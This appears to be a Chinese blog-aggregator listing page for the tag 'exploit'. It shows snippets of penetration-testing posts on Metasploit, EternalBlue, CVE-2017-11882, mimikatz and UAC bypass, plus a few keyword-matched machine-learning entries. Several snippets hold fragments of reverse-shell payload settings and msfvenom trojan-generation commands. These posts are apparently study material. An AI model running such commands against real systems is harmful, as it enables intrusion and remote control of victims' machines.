exploit 第14页

Exploit，shellcode经验技巧谈

这篇文章不是教你如何去写exploit，shellcode，而是希望提供一些关于编写或者研究exploit，shellcode的经验和技巧。适合理解了shellcode编写原理的朋友。

linkqishi·2020-09-16 08:34

在BT5里Metasploit内网***（exploit/windows/smb/psexec）

192.168.111.134***条件：知道目标机器的ip用户名密码因为非法测试是不允许的，所以我在虚拟机里面实验首先，我们来查看bt5和win2k3的ip地址进入msfconsole进行***实验实验使用的漏洞是exploit

weixin_33943836·2020-09-16 01:52

msf之木马程序

目录捆绑木马生成木马文件附：msfvenom介绍msfvenom简介msfvenom生成exploit/multi/handler模块简介设置监听反弹发送木马查看对方的ip查看对方目录截图开启摄像头附：

ihszg·2020-09-15 21:03

phpstudy配置laravel的伪静态

在域名管理中点击伪静态输入如下代码保存就i行了：#Checkifafileexists,orrouteittoindex.php.try_files$uri$uri//exploit/index.php

Yietion·2020-09-15 18:22

spring boot的Thymeleaf模板注入

参考：java安全开发之springbootThymeleaf模板注入https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf

caiqiiqi·2020-09-15 10:13

[CVE-2019-2725] Weblogc XMLDecoder RCE

0014xCVE-2019-2725/blob/master/weblogic_rce.pyhttps://github.com/pimps/CVE-2019-2725/blob/master/weblogic_exploit.pyWeblogic

caiqiiqi·2020-09-15 10:13

metasploit简单使用-生成木马反弹shell连接

windows_defender_exesetfilenametest.exesetpayloadwindows/meterpreter/reverse_tcpsetlhost192.168.1.11setlport5555exploit

星空你好·2020-09-15 09:36

Python脚本与Metasploit交互进行自动永恒之蓝攻击

我们首先利用findTarget()函数找到目标网段或目标主机中开放了445端口的主机，然后利用confickerExploit()函数将攻击代码写入configure.rc配置文件中，最后调用MSF框架读取配置文件进行攻击

谢公子·2020-09-15 08:34

ISCA 2018 论文部分（一）

论文部分(一)ISCA2018论文部分(一)1、DivisionofLabor:AMoreEffectiveApproachtoPrefetching2、ComputationReuseinDNNsbyExploitingInputSimilarity3

bubble_zyc·2020-09-15 06:23

Linux kernel Exploit 内核漏洞学习(0)-环境安装

前言在Linux上面搞事情很多东西都可能需要我们利用源码来自己编译,相对于Windows来讲可能会比较麻烦和耗时,这个过程中肯定会遇到很多报错,所以一定要有耐心…方法步骤编译内核首先到linux内核的官网下载一份内核源代码并解压:至于需要下载的版本,随意就好,我下载的是5.2.1的…然后先安装有些依赖:sudoapt-getinstallgitfakerootbuild-essentialncur

钞sir·2020-09-15 05:09

linux内核漏洞利用初探（2）：demo-null_dereference

1.NULLDereference（1）介绍古老的LinuxNULLpointerdereferenceexploit,映射0地址分配shellcode运行（2）漏洞代码#include#include

bsauce·2020-09-15 05:24

使用WebRTC开发Android Messenger：第3部分

文/NatalieSilvanovich原文链接：https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messe

LiveVideoStack_·2020-09-14 23:17

内网渗透哈希传递攻击

MSF哈希传递攻击条件：获取到了某台主机的Administrator用户的LM-Hash和NTLM-Hash，并且该主机的445端口打开着，可利用exploit/windows/smb/psexec漏洞用

L-socks·2020-09-14 21:39

BEEF的使用（简单版）

BeEFBEEF(TheBrowserExploitationFramework)：一款浏览器攻击框架，用Ruby语言开发的，Kali中默认安装的一个模块，用于实现对XSS漏洞的攻击和利用。

L-socks·2020-09-14 21:39

metasploit--multi/samba/usermap_script

metasploit的multi/samba/usermap_script使用1、searchsamba在渗透代码库中找出攻击Samba服务的模块2、useexploit/multi/samba/usermap_script

click#15·2020-09-14 21:38

kali linux之msf后渗透阶段

已经获得目标操作系统控制权后扩大战果提权信息收集渗透内网永久后门基于已有session扩大战果绕过UAC限制useexploit/windows/local/asksetsession-idsetfilenameuseexploit

weixin_30606461·2020-09-14 20:17

MSF里侦听模块的使用教程 exploit/multi/handler

标题关于MSF侦听模块的第一次使用侦听模块exploit/multi/handler在使用这个模块的时候也被这个功能惊呆了，不管外网内网都能反弹shell，就是windows10的防火墙过不去，windows7

F&G·2020-09-14 20:59

Metasploit利用kali命令获取针对不同目标环境的渗透攻击模块数量

在Metasploit控制台程序中，使用命令searchtype:exploittarget:windows2000，如下：观察到关于windows2000的渗透攻击模块数量为170。

Dagger-axe-x·2020-09-14 19:52

Metasploit usermap_script漏洞相关笔记

模块的位置exploit/multi/samba/usermap_sc

isinstance·2020-09-14 19:38

metasploit利用CVE-2017-11882

/msfconsoleuseexploit/windows/fileformat/cve_2017_11882setURIPATHtestsetpayloadwindows/meterpreter/reverse_tcpsetlhost172.18.126.113setFILENAMEhelloword.doc

caiqiiqi·2020-09-14 18:33

1.MS17-010 漏洞利用

192.168.223.134，发现以下漏洞：2）漏洞利用攻击对象：192.168.223.134，kali：192.168.223.135（1）进入MSF框架（2）查询漏洞模块并使用searchms17_010useexploit

southwind0·2020-09-14 18:26

SMB MS17-010 利用（CVE-2017-0144 ）

exploit-db:https://www.exploit-db.com/exploits/42315/该漏洞的影响版本很广泛：MicrosoftWindowsWindows7/8.1/2008R2/

weixin_30408309·2020-09-14 17:07

从CVE-2007-1567分析学习构造poc

漏洞概况漏洞编号:CVE-2007-1567漏洞类型:远程任意代码执行漏洞成因：堆栈缓冲区溢出漏洞软件：WarFTPDaemon(1.65及之前版本）资源连接：https://www.exploit-db.com

useror·2020-09-14 17:33

stack canary之pwnbale.kr MD5 calculator

WemadeasimpleMD5calculatorasanetworkservice.Findabugandexploitittogetashell.Download:http://pwnable.kr

久许·2020-09-14 14:38

PHPCMS v9.2.4文件上传漏洞分析【附Exploit】

phpcms版本：v9.2.4利用条件：由于文件上传利用了Apache解析漏洞，因此只适用于Linux+Apache网站，Windows下的Apache似乎不存在解析漏洞1、攻击演示（1）本地搭建phpcmsv9.2.4环境（2）随便访问一个页面，用burpsuite抓住这个数据包，修改抓住的http数据包如下图所示：要注意的几点如下：1、一定要是POST请求2、URL中的“m、c、a”这三个参数

MySQL-·2020-09-14 11:31

mimikatz实战抓管理员密码和 bypass uac

之后必须是管理员的权限(system)一般思路：先拿shell,再想办法提升权限获取一个shell是前提1>达到实验效果即可,这里通过msf自带功能生成一个123.exe,详细上一篇文章有笔记2>msf设置监听useexploit

莫憨憨·2020-09-14 08:56

MS16-032 漏洞复现

exploit-db的详情：https://www.exploit-db.com/exploits/39574/Windows:SecondaryLogonStandardHandlesMissingSanitizationEoPPlatform

weixin_34324081·2020-09-14 08:34

Windows内核漏洞利用提权教程

Windows-Exploit-suggesterMetasploit内置模块提供了各种可用于提权的localexploit

systemino·2020-09-14 07:22

msf之使用震网三代来提权

cve_2017_8464_lnk_lpe，他就是震网三代的exploit上次没有成功将x64的搞定，现在搬来了震网三代看我来个远程执行漏洞的提权前面已经拿到shell，但没有system权限我也是稍微找了以下

佛性死磕·2020-09-14 07:51

渗透测试-windows EXP提权

windowsEXP提权QQ1285575001WechatM010527技术交流QQ群599020441纪年科技amingEXP溢出提权（不可以使用技巧/无障碍提权）exploit—>windows溢出利用

amingMM·2020-09-14 07:15

MS16-032 提权

WindowsVista、Windows7、Windows8.1、Windows10、Windows2008Server、Windows2012Server漏洞利用脚本下载地址：https://www.exploit-db.com

prettyX·2020-09-14 07:30

msf木马

reverse_tcplhost=本机iplport=本机端口-fexe>文件夹(msfvenom用于生成后门木马的软件，木马可利用社交工程学发送到目标主机)2,输入msfconsole回车然后useexploit

fsociety_h4cker·2020-09-14 06:42

ms16_032系统提权

shikata_ga_nai-i13-b'\x00\xfff\x0a'lhost=10.10.10.128--platformwindowslport=443-fexe>/root/test.exe2.在msf下开启监听useexploit

a439017985·2020-09-14 05:47

Metasploit内网实战篇,NAT环境+bypassUAC内存注入绕过+win7提权

MetasploitPro4.9版本auxiliary/pro/generate_dynamic_stager模块替换了之前的exploit/pro/windows/dynamic_exe增加了动态AV

代码析构师·2020-09-14 05:55

bypass UAC 提权

在meterpreter下getuidsysinfo查看系统版本及相关信息（多少位）backgroundsearchbypassuacuseexploit/windows/local/bypassuac_eventvwr

a439017985·2020-09-14 05:19

WordPress 0day漏洞未授权密码重置CVE-2017-8295 PoC已经开始流传绿盟科技发布预警通告...

据ExploitBox称，wordpress的密码重置功能包含一个漏洞,在某些情况下,攻击者可以在没有以前的身份验证之前获取密码重置链接。

weixin_33725239·2020-09-13 18:40

WordPress all version 0day exploit

http://www.vul.kr/wordpress-all-version-0day-exploit

cnbird2008·2020-09-13 17:53

pwn入门笔记（4）——如何利用printf漏洞突破canary保护

实例分析编译printf2.c,要加canary保护输入写exp,利用printf漏洞来突破canary并且覆盖ret#includevoidexploit(){system("/bin/sh");}voidfunc

balbalba·2020-09-13 14:26

视频超分——14 PFNL(待更新)

ProgressiveFusionVideoSuper-ResolutionNetworkviaExploitingNon-LocalSpatio-TemporalCorrelations参考资料：论文内容

C2H33·2020-09-13 06:47

初探BeEF

就是TheBrowserExploitationFramew

ouyangbro·2020-09-13 04:41

一次迷迷糊糊的靶机渗透Lazsysadmin实战

192.168.85.141kali攻击机：192.168.85.142发现靶机开启了22，80，139，445，3306，6667端口，并且靶机运行着samba服务直接使用msf对samba服务器发起攻击useexploit

FFM-G·2020-09-13 03:02

【强化学习】多臂赌博机问题(MAB)的UCB算法介绍

UCB算法UCB在做EE(Exploit-Explore)的时候表现不错，但是一个不关心组织的上下文无关(contextfree)bandit算法，它只管埋头干活，根本不观察一下面对的都是些什么样的arm

weixin_30293079·2020-09-13 03:22

《metasploit渗透测试魔鬼训练营》靶机演练之第五章实战案例MS08-067漏洞

如图：接下来，直接指向exploit命令：成功返回s

Donald_Liang·2020-09-13 03:22

Windows提权

2.2工具准备1、在攻击机上安装：python2环境下载xlrd包:pipinstallxlrd2、下载Windows-Exploit:https://github.com/AonCyberLabs/Wi

初学者L_言·2020-09-13 02:35

MSF笔记

share/metasploit-framework/modulesauxiliary用于各种辅助功能比如：信息收集、枚举、指纹探测、扫描encoders编码模块，对payload进行加密evasionexploits

Yl0j8k·2020-09-13 02:59

WiFi漏洞可致数据泄露

根据美国加州大学河滨分校的研究者指出，他们发现了一种路径外TCP漏洞（Off-PathTCPExploit）。借助该漏洞，攻击者可利用TCP和Wi-Fi之间的相互作用，执行W

互联网安全研究院·2020-09-12 15:25

二进制漏洞与利用学习

二进制漏洞与利用学习一、主要术语Binary：由编译类语言生成的可执行程序Vulnerability：Binary中包含的可被利用的BugExploit：借助Vulnerability来劫持Binary

tata_qing·2020-09-12 01:22

深度学习之语义分割-RefineNet

RepeatedsubsamplingoperationslikepoolingorconvolutionstridingindeepCNNsleadtoasignificantdecreaseintheinitialimageresolution.WepresentRefineNet,agenericmulti-pathrefinementnetworkthatexplicitlyexploit

leo_whz·2020-09-11 23:44

深度学习之语义分割-PSPNet

Inthispaper,weexploitthecapabilityofglobalcontextinformationbydifferent-region-basedcontextaggregationthroughoutpyramidpoolingmoduletogetherwiththeproposedpyramidsceneparsingnetwork